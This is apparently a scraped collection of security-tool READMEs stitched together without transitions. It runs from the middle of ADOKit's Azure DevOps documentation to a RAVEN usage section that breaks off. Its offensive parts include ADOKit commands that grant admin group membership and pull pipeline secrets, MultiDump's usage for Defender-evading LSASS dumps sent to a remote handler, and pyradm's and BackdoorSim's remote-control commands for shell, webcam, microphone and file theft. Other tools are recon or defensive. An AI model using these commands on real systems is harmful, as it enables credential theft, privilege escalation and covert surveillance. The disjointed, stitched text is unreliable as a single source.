C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin
module along with a /user:
for a given user to be removed from the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc
module along with a /user:
for a given user to be added to the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc
module along with a /user:
for a given user to be removed from the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc
module along with a /user:
for a given user to be added to the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc
module along with a /user:
for a given user to be removed from the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars
module along with a /project:
for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets
module along with a /project:
for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections
module along with a /project:
for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all
in the /project:
argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json
- Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)PersistenceTechniqueWithADOKit.json
- Detects the creation of a PAT or SSH key with ADOKitFor detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.
Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.
npm install -g noia
noia
Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.
View custom binary files. Directly preview SQLite databases, images, and more.
Search application by name.
Search files and directories by name.
Navigate to a custom directory using the ctrl+g shortcut.
Download the application files and directories for further analysis.
Basic iOS support
and more
Noia is available on npm, so just type the following command to install it and run it:
npm install -g noia
noia
Noia is powered by frida.re, thus requires Frida to run.
See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/
Security Warning
This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.
MIT
skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.
Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β in this case planes!
To run skytrack on your machine, follow the steps below:
$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py
skytrack works best for Python version 3.
skytrack features three main functions for aircraft information
gathering and display options. They include the following:skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.
skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"
There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft
reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.ICAO and Tail Numbers follow a mapping system like the following:
ICAO address N-Number (Tail Number)
a00001 N1
a00002 N1A
a00003 N1AA
You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers):warning: Converter only works for USA-registered aircraft
ICAO Aircraft Type Designators Listings
skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.
If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.
To check out my other works, visit my GitHub profile.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe
or comsvc.dll
, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed
, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll
method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump
is used, ProcDump.exe
will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip
option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r
.
An additional option to dump the SAM
, SECURITY
and SYSTEM
hives are available with --reg
, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper
, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe
can be pasted into MultiDump.c
and Common.h
.
Self deletion can be toggled by uncommenting the following line in Common.h
:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h
:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/
During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.
1- Clone the repository
git clone https://github.com/yousseflahouifi/dorkish.git
2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- click on Load unpacked extension button and select the dorkish folder.
Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/
Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty
Remote administration crossplatfrom tool via telegram\ Coded with β€οΈ python3 + aiogram3\ https://t.me/pt_soft
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.git
cd pyradm
pip3 install -r requirements.txt
Put bot token to cfg.py, ask @Bothfather
python3 main.py
Put bot token to cfg.py
pip install nuitka
nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py
BackdoorSim
is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer
and BackdoorClient
. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim
, you will need to install it on both the server and client machines.
shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git
shell $ cd BackDoorSim
shell $ pip install -r requirements.txt
After starting both the server and client, you can use the following commands in the server's command prompt:
upload [file_path]
: Upload a file to the client.download [file_path]
: Download a file from the client.screenshot
: Capture a screenshot from the client.sysinfo
: Get system information from the client.securityinfo
: Get security software status from the client.camshot
: Capture an image from the client's webcam.notify [title] [message]
: Send a notification to the client.help
: Display the help menu.BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool
If you want to read our article about Backdoor
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
β AzSubEnum git:(main) β python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --thread 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py
WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com
You can run this application on a container after build a Dockerfile.
docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o
You can run this application on a container after pulling from DockerHub.
docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.
To know more about our Attack Surface
Management platform, check out NVADR.
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Possible usages for Raven:
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear β the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality β each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1
Another way to setup the environment is by running our provided docker compose file:
git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup
Step 3: Run Raven Downloader
Org mode:
raven download org --token $GITHUB_TOKEN --org-name RavenDemo
Crawl mode:
raven download crawl --token $GITHUB_TOKEN --min-stars 1000
Step 4: Run Raven Indexer
raven index
Step 5: Inspect the results through the reporter
raven report --format raw
At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.
Raven is using two primary docker containers: Redis and Neo4j. make setup
will run a docker compose
command to prepare that environment.
The tool contains three main functionalities, download
and index
and report
.
usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows
usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000
usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False
